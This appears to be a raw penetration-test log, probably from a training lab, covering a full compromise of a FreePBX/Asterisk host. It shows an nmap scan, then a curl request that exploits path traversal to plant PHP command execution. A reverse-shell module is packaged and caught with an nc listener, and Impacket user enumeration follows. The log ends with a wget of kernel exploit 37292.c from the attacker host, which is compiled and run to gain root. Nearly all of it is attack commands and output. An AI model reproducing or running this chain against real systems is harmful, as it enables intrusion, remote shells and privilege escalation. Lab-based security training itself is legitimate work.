nmap -sC -sV -T4 -A -Pn -p- --open 10.11.1.17
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-14 14:57 EST
Nmap scan report for 10.11.1.17
Host is up (0.025s latency).
Not shown: 65526 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 53:c1:71:52:3e:c3:9c:8d:e1:70:3f:14:e7:73:09:fa (DSA)
|   2048 61:67:5a:d2:d9:ee:12:00:70:ef:61:ac:09:85:e3:2c (RSA)
|   256 fc:07:b3:93:03:9e:3d:54:84:f7:ed:41:3d:ca:54:d0 (ECDSA)
|_  256 4e:53:a1:92:2f:fb:dc:43:4a:b1:39:89:9d:4c:4d:b9 (ED25519)
80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
| http-robots.txt: 1 disallowed entry 
|_/
| http-title: 404 Not Found
|_Requested resource was config.php
110/tcp  open  pop3        Dovecot pop3d
|_pop3-capabilities: AUTH-RESP-CODE SASL PIPELINING STLS TOP UIDL CAPA RESP-CODES
| ssl-cert: Subject: commonName=pbx/organizationName=Dovecot mail server
| Not valid before: 2016-10-06T11:26:13
|_Not valid after:  2026-10-06T11:26:13
|_ssl-date: TLS randomness does not represent time
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp  open  imap        Dovecot imapd (Ubuntu)
|_imap-capabilities: LOGINDISABLEDA0001 SASL-IR STARTTLS LOGIN-REFERRALS ENABLE capabilities have IDLE listed more post-login LITERAL+ Pre-login ID IMAP4rev1 OK
| ssl-cert: Subject: commonName=pbx/organizationName=Dovecot mail server
| Not valid before: 2016-10-06T11:26:13
|_Not valid after:  2026-10-06T11:26:13
|_ssl-date: TLS randomness does not represent time
445/tcp  open  netbios-ssn Samba smbd 4.1.6-Ubuntu (workgroup: WORKGROUP)
993/tcp  open  ssl/imap    Dovecot imapd (Ubuntu)
|_ssl-date: TLS randomness does not represent time
|_imap-capabilities: AUTH=PLAINA0001 listed LOGIN-REFERRALS ENABLE capabilities have IDLE Pre-login more post-login LITERAL+ SASL-IR ID IMAP4rev1 OK
| ssl-cert: Subject: commonName=pbx/organizationName=Dovecot mail server
| Not valid before: 2016-10-06T11:26:13
|_Not valid after:  2026-10-06T11:26:13
995/tcp  open  ssl/pop3    Dovecot pop3d
| ssl-cert: Subject: commonName=pbx/organizationName=Dovecot mail server
| Not valid before: 2016-10-06T11:26:13
|_Not valid after:  2026-10-06T11:26:13
|_ssl-date: TLS randomness does not represent time
|_pop3-capabilities: AUTH-RESP-CODE SASL(PLAIN) PIPELINING CAPA TOP UIDL USER RESP-CODES
5038/tcp open  asterisk    Asterisk Call Manager 2.8.0
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.11 - 4.1
Network Distance: 2 hops
Service Info: Host: PBX; OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
Host script results:
| smb2-time: 
|   date: 2025-02-14T19:57:44
|_  start_date: N/A
| smb2-security-mode: 
|   3:0:0: 
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: PBX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_clock-skew: mean: -19m58s, deviation: 34m38s, median: 1s
| smb-os-discovery: 
|   OS: Unix (Samba 4.1.6-Ubuntu)
|   Computer name: pbx
|   NetBIOS computer name: PBX\x00
|   Domain name: 
|   FQDN: pbx
|_  System time: 2025-02-14T20:57:44+01:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
 
TRACEROUTE
HOP RTT      ADDRESS
1   24.73 ms 10.11.1.17
 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.14 seconds

80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
| http-robots.txt: 1 disallowed entry 
|_/
| http-title: 404 Not Found
|_Requested resource was config.php

curl "http://10.11.1.17/admin/ajax.php" -H "Host: 10.11.1.17" -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0" -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" -H "Accept-Language: en-US,en;q=0.5" --compressed -H "Referer: http://10.11.1.17/admin/ajax.php" -H "Cookie: lang=en_US; PHPSESSID=6ve5b92bku7mk4hc5sbc60jhr3" -H "Connection: keep-alive" -H "Upgrade-Insecure-Requests: 1" --data "module=hotelwakeup&command=savecall&day=now&time="%"2B1 
week&destination=/../../../../../../var/www/html/0x4148.php&language=<?php system('uname -a;id');?>"
{"error":{"type":"Exception","message":"Attempted to load Hotelwakeup with a hint of \/var\/www\/html\/admin\/modules\/hotelwakeup\/Hotelwakeup.class.php and it didn't exist","file":"\/var\/www\/html\/admin\/libraries\/BMO\/Self_Helper.class.php","line":161}}   

cp /usr/share/webshells/php/php-reverse-shell.php ./

mkdir shell
mv module.xml install.php ./shell

tar -cvzf shell-1.0.tar.gz shell
shell/
shell/module.xml
shell/install.php

nc -lnvp 1234
listening on [any] 1234 ...
connect to [172.16.1.1] from (UNKNOWN) [10.11.1.17] 56648
Linux pbx 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:43:14 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
 02:15:50 up  5:18,  0 users,  load average: 0.00, 0.02, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1001(asterisk) gid=1001(asterisk) groups=1001(asterisk)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
asterisk

5038/tcp open  asterisk    Asterisk Call Manager 2.8.0
Device type: general purpose

445/tcp  open  netbios-ssn Samba smbd 4.1.6-Ubuntu (workgroup: WORKGROUP)

samrdump.py 10.11.1.17
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
[*] Retrieving endpoint list from 10.11.1.17
Found domain(s):
 . PBX
 . Builtin
[*] Looking up users in domain PBX
Found user: pbx, uid = 1000
pbx (1000)/FullName: pbx
pbx (1000)/AdminComment: 
pbx (1000)/UserComment: 
pbx (1000)/PrimaryGroupId: 513
pbx (1000)/BadPasswordCount: 0
pbx (1000)/LogonCount: 0
pbx (1000)/PasswordLastSet: 2016-10-06 10:35:53
pbx (1000)/PasswordDoesNotExpire: False
pbx (1000)/AccountIsDisabled: False
pbx (1000)/ScriptPath: 
[*] Received one entry.

╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
Linux version 3.16.0-30-generic (buildd@kissel) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #40~14.04.1-Ubuntu SMP Thu Jan 15 17:43:14 UTC 2015
Distributor ID:	Ubuntu
Description:	Ubuntu 14.04.2 LTS
Release:	14.04
Codename:	trusty
 
╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version
Sudo version 1.8.9p5

╔══════════╣ Cron jobs
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs
/usr/bin/crontab
* * * * * [ -x /var/www/html/admin/modules/dashboard/scheduler.php ] && /var/www/html/admin/modules/dashboard/scheduler.php
31 * * * * /var/lib/asterisk/bin/freepbx-cron-scheduler.php

╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/curl
/usr/bin/g++
/usr/bin/gcc
/usr/bin/make
/bin/nc
/bin/netcat
/usr/bin/perl
/usr/bin/php
/bin/ping
/usr/bin/python
/usr/bin/python2
/usr/bin/python2.7
/usr/bin/python3
/usr/bin/sudo
/usr/bin/wget
 
╔══════════╣ Installed Compilers
ii  g++                                 4:4.8.2-1ubuntu6                     amd64        GNU C++ compiler
ii  g++-4.8                             4.8.4-2ubuntu1~14.04.3               amd64        GNU C++ compiler
ii  gcc                                 4:4.8.2-1ubuntu6                     amd64        GNU C compiler
ii  gcc-4.8                             4.8.4-2ubuntu1~14.04.3               amd64        GNU C compiler
/usr/bin/gcc

python3 -c 'import pty; pty.spawn("/bin/bash")'

asterisk@pbx:/home/asterisk$ wget http://172.16.1.1/37292.c

asterisk@pbx:/home/asterisk$ gcc 37292.c -o 37292  
gcc 37292.c -o 37292
asterisk@pbx:/home/asterisk$ ./37292
./37292
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# whoami
whoami
root